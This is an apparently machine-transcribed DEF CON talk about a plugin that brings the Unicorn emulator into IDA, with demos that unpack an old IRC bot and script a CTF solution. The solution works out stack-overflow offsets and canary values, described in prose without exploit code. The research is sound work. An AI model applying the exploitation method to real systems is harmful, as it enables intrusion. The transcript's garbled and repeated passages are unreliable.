All right, DEF CON. So, you're at the last talk of the evening. Please welcome Chris Eagle. All right, thanks very much. Can everybody hear me? Can't hear you? Can't hear me? Good. That's where I was going to stay. I'm Chris Eagle. Thanks for coming. We've got the Mr. Robot machines back here. I don't know. I'm about tired of them. Oh, where'd my sheep go? She wandered off. Okay. Wrong angle. Not her best side. Okay, I'm here to talk about a project that I've been working on, for lack of a better name, called School Debug. And it's about emulating various processors using the Unicorn framework for emulation that was released at Black Hat last year. And because it's kind of what I do, it's all baked into IDA. And we'll see if it's interesting and go through a couple of examples and watch things crash and hopefully have some fun. Got to say this, everything I say today is my own opinion, not that of my employer and certainly not that of DARPA. They don't let me talk on their behalf. A little bit about me, if you don't know, these folks down here in the front row are filling seats to make the room look full. I'm a senior lecturer of computer science out at a place called the Naval Postgraduate School in Monterey, California. Doing security related stuff for a long time now. Do a lot of reverse engineering of various sorts. Play a lot of the capture the flag. I'll be racing back over there right after this talk is over. And a performer of really stupid IDA tricks. Proving that just because it can be done doesn't mean it should be done. But that's what you're here to watch, I guess. So this is really about CPU emulators. And they're useful in a lot of cases where you may not have a hardware to run a particular set of code on. Whether it's a well-structured binary or just a small snippet of something like say a shellcode. And you don't happen to have an ARM device or a MIPS device or a Spark device sitting around and you want to know how this thing behaves. So you're either going to become the world's best human MIPS engine. And you can interpret this stuff in your head and process it and figure out what's going on. Or you might want some help. And that's what I was looking for when I started thinking about baking emulators into things like IDA. Because in my particular use case IDA is a very common thing. It is virtually my desktop. I'm in it all the time. And I often have the desire to step out and execute something. Because perhaps my comprehension of the instruction set is not sufficient enough for me to understand what I'm reading. Or I just want to verify my suspicions about the behavior of a section of code. I like to run through it. Perhaps not an entire executable. Maybe I don't want to have to load up the ELF and deal with the kernel loader and the operating system etc. Libraries and just a full blown execution environment just to run through five or ten lines of code. So I thought about this and decided if I could just run these lines of code any time I wanted in some very stripped down environment wouldn't that be nice. And we'll talk about how I got to that or got there from here. You also may want to run code on obsolete platforms. Because you don't have real hardware to do it on. There's plenty of software emulators out there these days that do these kinds of things. But another use case for emulation. And there's another one I missed and I'm not going to go back. So emulators run the gamut from the simplest emulators that there are. Unicorn is in fact a fairly simple emulator. In fact it's not itself an emulator. It's not a stand alone thing. It is an API that lets you point at instructions and execute instructions one or more at a time. Okay. Receiving some syntax. Receiving some code. Receiving some code. Receiving some signals along the way. You can hook into it and get callbacks and so on. And I'm really not going to talk about the inner workings of Unicorn. But I would encourage you to go out and try to find some of the slide decks that they've posted. Following Black Hat last year. There's some other presentations they've given at a variety of conferences. And dig into the project if you think you have a use for baking an emulator into anything. It is sort of to execution of instruction sets. What Capstone was trying to do. It was trying to execute instruction sets. It was to disassembly of instruction sets. Right. A fairly general purpose framework across many architectures that lets you script up things very quickly. And in this case we're going to execute things in just a few lines of code. Okay. That's the basics of Unicorn. All I'm going to get into. Okay. But there are some fairly sophisticated emulators out there. I will refer to those later on. But Unicorn is literally pointing at an instruction and update the emulator. And that's the internal state of Unicorn and that is it. Right. If that instruction manipulates hardware you're not going to get anything like that. Okay. So the notion of a full blown emulator like a QEMU isn't what you're going to get out of Unicorn. Okay. So the idea with this project was to build a lightweight CPU emulator available in a static reverse engineering context. Right. I didn't want to have to go full on dynamic analysis with debuggers and process and hardware operating system. Any of that stuff. I just wanted a very lightweight emulator that would let me step through code. And we can expand on it from there and I'll go into a little bit about the history and what led me here again in a couple slides. The idea is you're looking at some code. We step out of that static context. We go execute through some instructions in this emulated manner. And then we take the knowledge that we gained by observing the execution state. Either to enhance our understanding of the binary or maybe incorporate some of that information back into our static picture to perhaps improve a disassembly, make some annotations, what have you. Maybe something as simple as utilizing a simple loop that you see in some code to decrypt, decode, deobfuscate, whatever it might be. Whether that itself is code, self modifying code or whether it's some data, some strings, anything like that. And then decrypt, decode, deobfuscate, bring that data or that information back into our static analysis without having to continue execution. Okay. And so the end result is what I'm going to talk about today. It's this lightweight emulator that I baked into IDA because if it's not in IDA I'm probably not going to use it. And that provides my static analysis side, my disassembly side. And then the emulator as I mentioned previously is going to be based on this unicorn framework. I'm going to blow through these slides. I imagine if you're sitting in this room today you're probably familiar with IDA. So if you're not, it's a commercial disassembler. There are some other disassemblers out there. We're seeing new ones every day. Binary Ninja is a new one that was just released and maybe we can take this project and integrate it with that someday. But for now I'm primarily working in IDA. It supports a lot of different processor families and so that's to me made it attractive to marry up with Unicorn which also supports a lot of different processor families. Not as many processor families as IDA does, but more than one, more than two, more than three, I don't know, six or so. I'll list them out here in a minute. But it meant that IDA could understand all of the code that I would ever want to emulate in Unicorn. Okay. Because the processors that IDA supports are a superset of the processor architectures that are supported by Unicorn. Okay. It's got, IDA itself has integrated debugging support. So actual dynamic analysis. Let's fire up a process attached to it and pull in state. For x86 and ARM targets and it can do some remote debugging on some other targets. It also has a decompiler for 32 and 64 bit x86 along with 32 and 64 bit ARM. But that's not entirely relevant to our talk today. Unicorn is a very, very important processor. So let's get started. Unicorn, as I mentioned, was introduced at Black Hat last year. Comes again out of the same group that did Capstone, the disassembly framework. And now they have a tool called Keystone. In fact, they may have talked about it at Black Hat. Anybody at Black Hat? Did they do Keystone this year? Yep. So they talked about their new project, Keystone. I hope these guys keep coming back. That's like three years in a row, Capstone, Unicorn, Keystone. They're all pretty useful projects. And Keystone is their assembly framework. So now we have a disassembly framework and assembly framework. And if you want to talk about the and an emulation framework and you start rolling these things together and you get a pretty powerful reverse engineering capabilities. There's the link out to their site is up there on the slide. It as an emulation framework is actually based on QEMU so if you've ever used QEMU you know that it also supports a large number of architectures and you might say well why do we have Unicorn if QEMU supports a large number of architectures and in fact Unicorn is based on QEMU right? Isn't this just the same thing all over again? The answer is not quite. QEMU has a lot of support all the way down into hardware shims that lets you do full blown system emulation. We can boot Linux, we can boot Windows in the QEMU environments because it has that support for. Hardware interfaces and virtual devices and so on. The Unicorn folks were not interested in any of that. All they wanted to do was be able to emulate processor instructions. They don't want the hardware interface, they're not trying to provide you network and video drivers or any of that stuff. They just wanted to help you emulate instructions. What does it do? Let's see. We run it in the emulator. What they did was they tore into QEMU and they were able to emulate the software. They ripped out all of that hardware abstraction layer and were left only with effectively the processors right? The software CPUs that they then layered on top of right? We instantiate a processor, we give it some state that it can manipulate and they give you access to that processor state and nothing more. They expose some of that up to a couple of different types of APIs and there you have it. Right? The scriptable emulator. Supports the family, the processor families that you've seen here. X86 both 32 and 64 bits. Same for ARM, Spark, MIPS, Motorola 68000. That's not all of the processor families that are supported by QEMU. But it's a start. It does take a fair amount of work to provide the interface to a given processor architecture. But I don't think it's going to work. I think it would be a stretch to add in some of the other processor families that are supported by QEMU if you wanted to enhance the capabilities of Unicorn. Okay? A number of projects, this is just one of them, have come along which make use of Unicorn. Some of them are pretty amazing. And baked into a lot of very interesting analysis frameworks. I posted a link at the bottom because you may be more interested in those than Unicorn itself because they provide somewhat more finished products. Right? These are things that you'd make use of right out of the box. Right? If you did not intend to bake, you know, if you didn't have a need to script an emulator of your own. Okay? So you can go find those out there and play around and so on. Okay? So I picked IDA and I picked Unicorn. There are some other emulators as I've mentioned. I talked about QEMU already. I talked about, well I haven't talked about Box. Box is another one. Okay? It is a pure X86 emulator. It is a more general version of Box. These are blurbs off of each of their project pages. Box is highly portable open source 32 bit X86 emulator. While QEMU is more general. Okay? Generic more processors open source machine emulator and virtualizer. It is a little bit more sophisticated than Box. But it is also, there is a lot more to it than Box. Okay? So could have gone with either of these I suppose. But they really weren't geared to script around. So, I think this is a good example of how you can go around. Okay? And just access just the processor bits. Okay? So this is sort of where I've been with this project. Okay? It's been kind of a long road. Unicorn came along and filled a need that I had and actually fulfilled a vision that I had back in 2003 when I built a tool called IDA X86 emulator. Okay? Where I wanted to do exactly what I described. I wanted to sit in IDA and I just wanted to emulate things. Okay? And use that to either transform my static analysis picture or enhance my understanding of the behavior of something. Okay? So I did that and at the time that I did that, I looked at those emulators, primarily Box and QEMU back then and thought, you know, can I rip into this, strip out the bits I don't need and take just the emulator. And I looked at it and I'm lazy and I said, hell no. Okay? Because they're way too big. Right? So 13 years later, 12 years later, somebody did it for me. Okay? And so then I revisited this project and revisited it. And I said, you know what? I'm going to do this. I'm going to do this. And I retooled and that's again why I'm here talking today. Right? Somebody did all the heavy lifting by stripping out all the unnecessary stuff out of QEMU and dropping it in my lap. Okay? Along the way, the HexRays folks did an integration between HexRays and Box. They did it in a slightly different way. I'll do two quick demos later on of what these things look like and the different approaches that you might take as you think about doing emulation in combination with a static analysis. And so they released a box debugger module that Ida could communicate with. Right? And if you're familiar with Ida, you understand what the debugging views look like in contrast to the pure static analysis views. And we'll see that here in a few minutes. Did a similar thing for the MSP430 processor, which was the processor that got used for the micro corruption challenges. If any folks have seen that, they're a lot of fun. Um, and they were, that was a pure MSP430 implementation and I didn't want to deal with their clunky user interface through a, through a browser. Uh, so did this emulator. Uh, it was in a style very similar to Ida x86MU. And then along came Unicorn and it took me a while but I finally decided uh to integrate it into Ida to see if I liked it better or provided, uh proved more useful than some of these other combinations of tools. As I mentioned, I looked at QAMU and Box briefly, but it was going to be a lot of work. Uh, I didn't have the time to do it all and again, uh, somebody else came along and did it. Uh, and their approach, because you, we finally get QAMU involved in this whole thing, uh, it gives us a lot more processors, right, than, than my particular approach, which was specifically an x86 emulator. And so I got that one narrow architecture and I've never had another architecture and I've never wanted to do another architecture because doing an architecture from scratch, uh, was just more work than I wanted to get involved with. So, uh, this was a nice marriage for me. Now, to the implementation. In implementing this, I had to make a couple of choices. Okay, again, uh, you know, I had to make a couple of choices. I had to make a couple of choices. Uh, hopefully people are somewhat familiar with IDA and what it looks like. Okay. With IDA, you get your standard disassembly view, okay, and then there's this debugging view. Okay, but, uh, you have to do a little bit of work to integrate what you learned from the debugger back into the disassembly view and often times it involves overwriting a lot of information, uh, in your disassembly view. Okay, so you might go into the debugger and learn something, but it's, it's fairly transient in nature because you're starting a process and then you're starting to process and eventually that process is going to terminate and the information that you learned, uh, vanishes with that process. Okay, there are ways to migrate some of that information back into IDA, uh, overwriting your init- your original data in IDA, um, but you'd have to automate some of that and, uh, it's, it's not necessarily a very clean approach. And so the alternative approach is you don't jump out into a debugger and you find some way to incorporate emulation right there on the debugger alongside your static analysis view. Okay, in order to do that, your emulation has to be able to main- maintain state. So you're either maintaining state entirely separately from what you're looking at in IDA, right? In IDA you get to see an entire disassembly, right, through the various portions of a program, your code, your data, et cetera. And what you don't have are things like a stack or a heap, right, any of your, uh, virtually allocated memory. Uh, and, but you need that in the emulation. Okay, so you're either maintaining state, or you're either maintaining, uh, you either start modifying your database and adding all of that, uh, those bits and pieces in there, right, so that you expose them and make them available to view and navigate through, or all of that information remains buried in the emulation and you have to come up with some way to, to propagate just what you want up into the static analysis view when you're ready to consume it, right, when you've decided that you've learned what you wanted to learn and you're ready to, to annotate that static analysis. Okay. When I did x86MU, I took a look at the data and I found that, uh, the data took the first approach, okay, and you're literally emulating on top of an existing IDA database. So as you do the emulation, your database gets modified. And there are some advantages and disadvantages to that approach, right? The disadvantages is obviously that it's destructive, okay? So once you've modified something, if you know, if you're an IDA user, you know there's no undo in IDA, okay? So once you've modified it, right, there's no going back, right? So if you want to see what it used to look like, you're either maintaining a separate database, a lot of things, uh, and it becomes, it becomes a headache. But there, I have found it to be useful in many cases. The alternative approach is to take a debugging sort of approach, and generally speaking in IDA that means you're launching a process and you're attaching to it in the, the way that a standard debugger would attach to that process, controlling the process, viewing the state of the process, uh, using IDA as a viewer, okay? So you see what the running process state is, it gives you access to all the things you'd have in a typical debugger. And in this case, you're not manipulating your static view at all. That IDA database doesn't get changed at all, unless you absolutely want it to, okay? Your view is strictly into that transit process, okay? And again, when it's done, you're done, okay? Perhaps you learned something, perhaps you used it to update your state, okay? The way you use that is entirely up to you. Okay, this is the approach that the Hex Race folks took when they integrated Box into IDA, okay? IDA shells out to Box, they created some IPC links between IDA and Box, IDA pushes the state into Box, okay? Including, right, the code, the data that are being represented in that IDA database, and then tells Box to go, right? Gives it an initial reg, initial register state, and then single steps or allows it to run freely, okay? And then, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, uh, as you see fit, right, then pulls the data back out of Box and shows it to you in IDA's debugger view, but again, once you're done, you're done, and none of that updates your static analysis state, right? As I mentioned, there are some ways to pull state back into IDA, right? But, you know, it's entirely up to you how you're gonna do it. And I'll show you some demonstrations, I'll show you two approaches, uh, and, uh, you can use that to understand what I did with unicorn. In the case of Unicorn, the approach I ended up taking was the debugging approach, right, because it just felt a little bit cleaner, I didn't want to get into updating databases, uh, I wanted to leave things flexible for the future, uh, might come along and implement it differently, uh, but in order to implement it outside of a debugger, right, IDA doesn't provide you any tools, uh, to display something like registers, for example, any of that execution state, right, while you're in a static analysis state, registers have no values, so you have to invent that user interface yourself, okay, so that's one of the hard parts about doing it, um, outside of, uh, the debugger state. My wife's probably, she's sitting up here and not liking the slide, I don't know, or agreeing with it. Okay, in any case, um, I, I took on this, this task, trying to integrate IDA with, uh, Unicorn, uh, a lot of unhappy development times, but, uh, it was, it was a lot of time, um, a supportive wife, okay, uh, a lot of time dealing with a mostly undocumented, uh, IDA interface, uh, dealing with a particular style of plugin known as a debugger plugin, right, and again, uh, for those of you know IDA, you know the state of its documentation, uh, so I spent a lot of time reverse engineering IDA to try to learn how their debuggers actually work, because there isn't much to go on there. Uh, at the same time, I was trying to integrate a piece of software, uh, that was, uh, uh, uh, uh, uh, uh, uh, uh, that was really, I say beta, that's kind of generous, at the time I was doing this, it was more like pre-alpha, okay, so, uh, you never know where the problems lie. Is it Unicorn? Is it IDA? Is it me? Uh, and, uh, that's what led to bullet number one, okay. But in the end, I was able to subclass IDA's, uh, debugger type, okay, to provide debuggers for all of the supported Unicorn, uh, processor families, and, uh, end up with a debugger style interface for any one, uh, of these architectures that you could use to emulate code wherever you are. So, if you're using IDA on Windows, and you're running Unicorn, and you open up a MIPS binary, hey, you don't have to go find a MIPS platform anywhere, right? You can just pop out into the debugger and emulate through your MIPS code. And if you want to, you can utilize IDA's features, and you can, uh, you can use IDA's features for pulling some of that information back. Same is true for Spark, or Arm. What did I say? 68K? Hey, x86, 64 bit x86 on the 32 bit platform, or vice versa. Um, so, uh, I got exactly what I wanted 12 years ago, with a lot more flexibility, right? As it's doing this, you can go anywhere from basic, I've got five lines of code I want to emulate, hey, to trying to emulate through, uh, I don't know, I don't know, an actual process, right? If the code is formatted in the form of an executable like an ELF or a PE, hey, the debugger plugin tries to load that up and map that into an address space that is roughly what you get, hey, if you were to run it on the actual architecture the binary was intended for. Okay, there's a lot of challenges with doing that, hey, you don't get to op- we don't get to emulate through the kernel, right? We don't have a system call interface, although, I'll talk about later, one of my goals is to add the capability of hooking system calls, so you can stub out some of the more common ones, perhaps, and provide some fake results, uh, back up into your emulation, okay? So, the, uh, debugger includes very basic loaders for, uh, PEs and ELFs, right, that load those two file formats into unicorns, uh, state into it, into the unicorn emulation, uh, before you start up your system call interface. So, you can add a lot of things to your emulation, gives you stacks, uh, and so on. Okay? If you don't have a format that unicorn recognizes, okay, or the school debug recognizes, then all it does is takes the entire content of your IDA database and just copies it out into mapped sections, right, in the unicorn emulator. So, however it's mapped in IDA, right, that's what you get out of unicorn. It usually throws in a stack, okay, because, uh, that's something that you're going to need that you don't ever see in IDA. Okay, but. stacks are pretty useful and a lot of instructions make use of it. Some of the issues with doing all of this, if anybody's used Unicorn right you might have some familiarity with building that. IDA is a 32 bit executable. Even though you may see well there's this 64 bit version of IDA out there all that means is that it can understand 64 bit binaries. It is still a 32 bit native executable when you go to run it. That means that if you want to integrate with it you've got to build 32 bit libraries. So when you build Unicorn you've got to build it the 32 bit library of Unicorn for the platform you're running IDA on. Whether that's Windows, Linux or a Mac. Now Unicorn unfortunately doesn't have very good support for building 32 bit libraries. They sort of assume that everybody's doing 64 bit stuff these days. Why would you want to build 32 bit binaries? Why would you want to build 32 bit libraries? Why would you want to build 32 bit binaries anymore? So we had to fix that up a little bit and they're getting better at being able to build 32 bit binaries. Doesn't also have, also does not have very good support for building on Windows. And that's primarily related to QEMU's dependence on GLIB. Which is not found on Windows platforms. Unless you reach out and you get things like SIGWIN or MING and install the requisite libraries out of those particular utilities. So this complicates Windows builds in fact they don't have Windows built into their continuous integration. Uh when you uh go observe how the project is uh the, the state of the project out on their uh GitHub site. So it makes building on Windows a little bit tough. Okay? But it can be overcome and in the end you're able to integrate uh Unicorn into IDA on all the platforms for which IDA is available. And then you ultimate All right. It's about all I'm going to talk about at a high level. It's pretty straightforward. Here's a disassembler. Here's an emulator. And it either works or it doesn't. So we'll see. I'm going to go through some demos and show you what it looks like. I'm going to start off with some simple deobfuscation stuff. I'm going to show it to you in a couple different ways. I'm going to go through it fairly quickly. I'm going to try not to get bogged down into the details of IDA-isms or how to use IDA or things like that. I'm just going to show you what each of these things do, what they look like, and let you form your own opinions as to the utility of each and perhaps whether you prefer one approach to another. So if this all works out, I'm going to use this old-style emulator. Let's see. I've got to pick the right version of IDA. Okay. We'll do this one. All right. So you may recognize the section name. This is just a UPXPAC binary. And if all goes well here, I'm going to bring up this old emulator. Please work. It's coming. My machine is slow. This is an example of the original x86. This is the x86 emulator that I did in IDA. Good jokes. And what you're going to see here, assuming this works, is a crude, like, debugger console that's going to come up. We're not going to leave IDA's static user interface. I'm not happy with this. And we're going to be able to emulate through IDA without leaving its common interface here unless it never comes up. Awesome. Okay. While that's going on, we may as well start the other one. Behind this door, we're going to try and do this with Box, okay, IDA's integrated Box plugin. So in order to do that, we've got to switch our debugger over. And you see IDA offers a number of debuggers. It's context-aware, what platform you're running IDA on, and the nature of the binary. That you're loading up. So you can see one of these is a local Box debugger. And assuming I haven't messed this up either and still have Box installed properly, if I choose Box as a debugger, no, that doesn't do anything. We've got to actually run it, right? So I'll set a breakpoint at the beginning of the code here. I'll set a breakpoint down towards the end over here. We're not going to jump out and execute any of these function calls because they jump out into Windows libraries. We'll just set a breakpoint down here at the end. Maybe bring up a strings view. Try to convince you that it's actually doing work. All these strings, I don't know if that shows up at all. But these are the obfuscated strings that are part of the binary. You can see bits and pieces of strings, but it's not fully deobfuscated. And if Box lets me do this... Then we can start debugging. And this is going to toggle into maybe a segue back to the other demo. No, there's Box starting up. I've got too much going on in this machine. And so IDA started off Box. It's got this IPC channel between the two. And now IDA gives us a debugger view, right? We're not really running the process. All the emulation data has been stuffed into Box. And Box is going to do its thing. But this is a standard IDA debugger view. If you were running a process and actually attached to it, this is what you'd see. It's not the best user interface in the world. It's probably the number one knock against using IDA as a debugger. It's user interface is not great. But we can step through it. And the register state updates up here and so on. And we can let it run. And we should hit our second break point at some point down there. And we can go back and look at the strings on the binary. And maybe if I did this right. You're just going to have to trust me. I need one of those things. Yeah. Wow. It's got to pull these strings out of Box memory. All right. Let's see how our other thing is doing. Look at that. It's like a cooking show. We've got a couple things in the oven at a time. So this is back to the emulated view, right? IDA x86 emu. Totally different view. We never leave. The normal IDA interface. And you've got this tiny little panel that pops up. It's very specific to x86. So taking this approach with other architectures, you would have to come up with your own interface. And replace all the x86 registers with whatever registers you have for that particular architecture. It lets you do some things like manipulate memory. Memory is really just the database. Everything you're manipulating is just a change to the database. All right. And you're just, that's your memory store. You fetch bytes out of the database. You emulate them. You modify the database if that's what it says to do. But again, it's destructive. All right. So we can sit here and I can click on, you know, step, step. And it's hard to see. But if you watch the blue here, it doesn't really highlight. That blue is stepping through various instructions. And we'll jump down and it follows through and so on. And I can reach down to the same part of the binary. Okay. Which is down here before these function calls. Set a break point and say run. And this is much slower than box because actually it's all the interactions with the IDA database are pretty slow. But we hit our break point and we can go back to our strings window and set this thing back up again. And we should have lots of hits. We have interesting strings. All right. Like this. And this is just an old IRC bot. But we got all these strings out of it because it's mostly deobfuscated. And then you say you're done. All right. We close this up. And you go back here. And, in fact, what was formerly empty space is now code that we can go and disassemble. All right. We didn't hop into any debugger. We've destroyed our database. All right. It doesn't look like it used to look. Okay. But what we can do is we can go back here. We've got deobfuscated code. And we just continue at this point doing static analysis. Okay. So it's a quick in and out. And I considered that approach. But for the user interface aspect of it, I might have gone that way. Now let's see if box is behaving for us. All right. Over on the box side, we got hopefully the same strings somewhere. Yeah. We got all this library code. All right. I have no idea where that's even coming. Well, here we go. All right. And so here are, again, it's an IRC bot. And you can see registry keys in there that it's going to run. It's going to reference and so on. So we get the same result, but we haven't modified the IDA database at all. Okay. So it's like a running process. Okay. And I would have to then extract this from box back into IDA, right, if I wanted to make this data permanent. Okay. So this is, again, the approach that I took. And now we'll go do this a different way. And this is where we thought those demos were bad. Let's see how we do here. Set a breakpoint up here. Try to set a breakpoint the same place down here. Okay. And this time I'm going to switch my debugger over. And if it's installed appropriately, it'll show up as school debug. Okay. So we do this. And we go back up here to the beginning. And we try to kick this off. Hopefully I hit my first breakpoint. Okay. And then the plug-in looks a lot like box. Right. So, but this is unicorn handling this particular emulation. Okay. And so you get register state over here. Right. Just like you do in box. Okay. And any other debugger and so on. And at this point, right, we can just step through and it tracks along and I can let it run. All right. And we'll do the whole strings trick. See if we get anything interesting. Okay. Right now there's not much but names of the couple libraries that get imported. And we go back over here and we let it run. Just hit go here. Hit our breakpoint. Come back, rerun strings. Okay. And like the other two emulators, okay, now we've got all of these, right, strings extracted from memory. And if we go down to the bottom of the self-decoding loop, we can jump up and very much like box, right, this is the extracted code which we can then turn into code up here in our emulator or in the debugging session. But again, I don't have that back in my database. And when I go to quit this, okay, I'm right back where I started from. Okay. And I don't have any strings. And if I follow the jump, right, up here you can see it's empty. Okay. Because this is the region in the binary that it unpacks itself into. Right. So it's very much like a debugger and not a static, you know, overwriter or whatever you might want to call it. Okay. So that's it emulating on 32-bit x86 code on 64-bit Windows. Let's see what else I think I'm going to do. Okay. Local ARM emulation. So Windows platform. No network connections. No ARM hardware. Okay. Somewhere I've got an ARM binary open. Okay. Let's see where this one comes from. Let me find the right binary. There we go. Okay. This is an ARM binary from an old DEF CON capture the flag. Shout out to legit BS. Right. Okay. One of their first CTFs. But ARM binary on Windows. Okay. And actually it's not going to offer me any debuggers because IDA has no clue what to do with this. Right. ELF binary. ARM. Windows. Right. Don't do ELF. Don't do ARM. Okay. But the debugger recognizes the architecture at least. So it says I'm available. And it's the only debugger that says it's available. So IDA has already selected it up there. And we can kick this off. And now we're debugging ARM more or less emulation. Don't worry about that. Awesome. Let's see where it goes. So there's some memory mapping problems there. Let's see. Not going to work. Clapping for my crash. It's all good. Look at that. We'll just pass all these exceptions down. And it looks like it's advancing. And maybe it's even updating registers. Okay. R2 is actually equal to 1 at this point. Look at that. Okay. I left this open. And it had some stale state. And I think it's not happy with me. Okay. But that's the idea, right? We're in a debugging session. And we can jump in and out of this without having to fire up an ARM environment. Okay. Do any remote communications to a remote ARM device. And then when we're done, we step out. And we're back in our IDA disassembly session. Okay. What else? Oh, now MIPS. Let's see. MIPS, I don't even have any idea how to read. All right. So somebody out there probably says that's MIPS. I don't know. All right. IDA thinks it's MIPS. Again, no MIPS debugger on IDA. I can't switch my debuggers. All right. There's no other debugger option. But you can see that. No, don't do that. All right. School debug is selected. Okay. So we try to hit go here. And hopefully we hit our break point from which maybe we can step out of this. Step. Okay. Although I don't have a stack. This is probably a bad choice. Let's see. Step. Step. Step. Step. All right. And we're emulating our way through MIPS code. Okay. Yes. Five minutes. Great. Because I am tired. Okay. So we hop out of that. And we're, again, back to our disassembly view. Okay. And I'm not going to go into the ways you integrate, you know, what you have available in your disassembly view and what you have available in your static view. But suffice it to say, there's ways to pull information back across. If you decide that it's useful for augmenting what you have on the static side. Okay. Last thing I'm going to do is take a look at one of the challenges from DEF CON qualifiers this year. And what this was, was a binary that they gave you a thousand of them. Okay. And when you went to interact with the competition, right, they asked you, you know, how many And you had one minute, right, to craft an exploit for one of these thousand binaries that they gave you the file name for. So you downloaded a thousand binaries and you had a minute to craft the exploit. So it's going to take a long time to do all that by hand. Okay. So you want to automate this and you want to have an answer in your hip pocket when they say, give me your exploit for binary number one. Okay. So how do you automate? Well, it turns out that all of these binaries have roughly the same path. Okay. And I'll describe it not by looking at the code, but by looking at the stack, and there's two buffers in here. Okay. And all of the binaries differ in the location of that user input buffer in the stack relative to the save return address, the size of that user input buffer in the stack, and then the content that gets placed into what I've called a canary string right there. Okay. So they gave you a free overwrite out of that user input buffer. Okay. So you have to figure out how much do I have to overwrite to clobber EIP. Okay. And after you've done that, right, which is not a problem, there's nothing hindering the overwrite, but they come back and verify that the canary string matches the original canary that they placed in there. So as you do your overwrite, you've got to rewrite the canary in there, and it better match their original string. But all thousand binaries have a different canary, and it's not always obvious exactly the way they set it. Right. They compute it. They copy it in one byte at a time. They do a string copy. They do it a lot of different ways. Okay. But they always end up doing a string compare at the end. So if you can put a breakpoint at the string compare, right, and hit it, it doesn't matter what you filled the buffer with. You can do some other computations to figure out the distance from the start of your buffer to save EIP. Set a breakpoint on the string compare. Right. Look at the required argument that's sitting on the stack and pick that out, and these become your parameters. What's my canary got to be? Right. How long is it from EIP all the way down to the buffer? And there's a couple other constants that you needed to pick out, but I didn't want to do this a thousand times by hand. Nobody did. And there's some good write-ups about using some other automated systems to solve this, but what I did was I scripted up this emulator, and the emulator, let's see, somewhere this script exists. Down here, you see things. Because this is implemented as an IDA emulator, right? You get all of IDA's debugger scripting. I'm sorry, IDA debugger. All of IDA's debugger scripting can be used to drive this thing. Right. So we write the script. We load the debugger. We set some debugger options to break on start. We run to the start address. Right. We do some things. Okay. We get the value of EIP, and I'm picking out all of the arguments, all of the bits and pieces from a dynamic environment, although I'm not actually running a process. I'm just emulating through it. And by the time I get done down to the bottom, I've picked out a bunch of parameters that I'm going to need. And what I did was I just took those parameters and wrote them out as a Python dictionary entry. And so I had a dictionary of parameters. When they told me what binary do you want to exploit, I said, well, I named it. My key into my dictionary is the name of the binary. I pick out the parameters, right, and I craft my buffer and fire it at them. And what that looks like is this. Okay. So I'll run IDA in batch mode. And then I'll be done, I promise. We've got this one and we've got which one? This one. Okay. So I've got two windows right here. I'm tailing an output file on the bottom. I'm going to use IDA in batch mode. You can see the long command line there. there. And what I'm going to do is I'm going to run that script that I wrote and I'm going to run it against one of these thousand binaries. Well in this directory there's three hundred of them and they all scroll up like that. And we'll see if this will work. I'm going to make sure I clear out some stale files. Mainly I've got to kill that IDA session because it's going to get in the way of the batch run. And we'll try this out. Now you'll see IDA flash you have to look in the background if everything works. So IDA is coming up in batch mode. We're in debugger mode. It's done. You can see the output down on the bottom. Right that quickly it got into an emulation on that elf binary. Okay. Ran through main. Picked off the parameters it needed and dumped them out to me. Now I wrapped that in a loop. Do it for every five minutes. And now I'm in the current directory and I've got my thousand exploit parameters and I'm ready to connect to the remote side. Okay. Okay. So for the future and very quickly. Uh better user interface when launching the emulator. It'd be nice to be able to specify some register state. Right now I just take a guess. Right. Where do you want to start your emulation? Do you want your any register to have particular values? So I'd like to have that done up. Uh. Um some some options for mapping into particular memory regions or loading other regions. Uh if you're familiar with IDA and debuggers there's a a very useful interface called app call that just that actually lets you incorporate uh functions or call them almost natively from IDA python. Right call out and have your function run and then spit the value back to you in your scripts. Uh I'd like to have a hooking library. Hey to be able to hook various functions and do things maybe other than what the emulator is doing or provide shims for the emulator. Uh I'd like to have a library for library calls or system calls things like that. Uh and also perhaps add the option to go ahead and pull in all of the shared libraries uh that a dynamic link binary might link to. So you can follow the library calls down into a shared library function and emulate your way through those if you wanted to do so rather than writing all the shims for them. Uh it's out there on GitHub. It's out there today. Uh I will push all the latest changes shortly after the con uh but if you're interested uh I'm always uh it in feedback if you want to collaborate I'd love to hear from you if you have ideas uh on features that might make it more useful uh and you don't want to implement them at least share them with me and maybe I'll get around to them or find somebody uh who might uh like to implement any of your ideas. And that's it and I'm happy to take questions and if not uh if no questions please enjoy the rest of your con. Do we have microphones somewhere for questions? Yeah I'm supposed to direct you to a microphone so it gets picked up you can come if you want to come up here. Microphone is oh it's right here it's right over here. Drink don't forget your drink that's right. Hello um a couple slides back you mentioned the two uh console output windows. That's the wrong way. How do you recognize what magic 4 bytes overwrite EIP and how do you deal with bad characters? Um when I was doing the scripted demo so what I did was in the scripted demo what I had to do was I had to study a couple of the binaries manually right not a thousand of them but I looked at two or three of them uh looked at the first one I said well this is clearly an easy stack overflow I understand if it was just this one exactly how I would exploit it. Then I looked at another one I said oh this one is subtly different. What's different about it and can I develop an analysis that walks through the program and at certain key points in the program picks off certain things for me. Okay so what are the parameters where is that buffer getting copied really um the the string cop or the string compare gives it all away it tells me the start of the user buffer and the start of the canary buffer and from there what I can do is do some math to figure out where saved EIP was. Okay third binary right all the way up to the end of the program and then the second binary and all of these things again looking similar and so I took what I had learned from looking at three binaries developed an automated process that I would apply to the three binaries and then it extended nice and neatly to the thousand binaries which was roughly what they intended and what they wanted to do was force you to do it quickly right so you you weren't going to be able to if you tried to reverse engineer all thousands to develop these answers you wouldn't have finished in the weekend. Okay so I don't does that answer your question? Yeah yeah now I'm assuming that's that's the logic you have to hard code into the program? Yeah. Okay so that's the logic that you have to bake into the script that you write so through here right are some various things that I was looking for right like saying extracting some register values I'm stepping one instruction at a time I I'm asking you know am I at certain types of instructions I'm counting the number of calls hey that I've encountered because you know the third call down the chain was going to be the stir copy and when I got to the stir copy right or the string compare or you know you could see what was going on with the string and then you could see what I'm doing is I'm picking some arguments off the stack right that have been placed there they're passing to the string compare and then I I'm using that to derive all the information I need to craft the exploit parameters. Okay awesome thank you. Sure any other questions? He's trying to get me out of here I think we're done thanks very much. I'll I'll be happy to talk to you off the side of the stage. Thank you.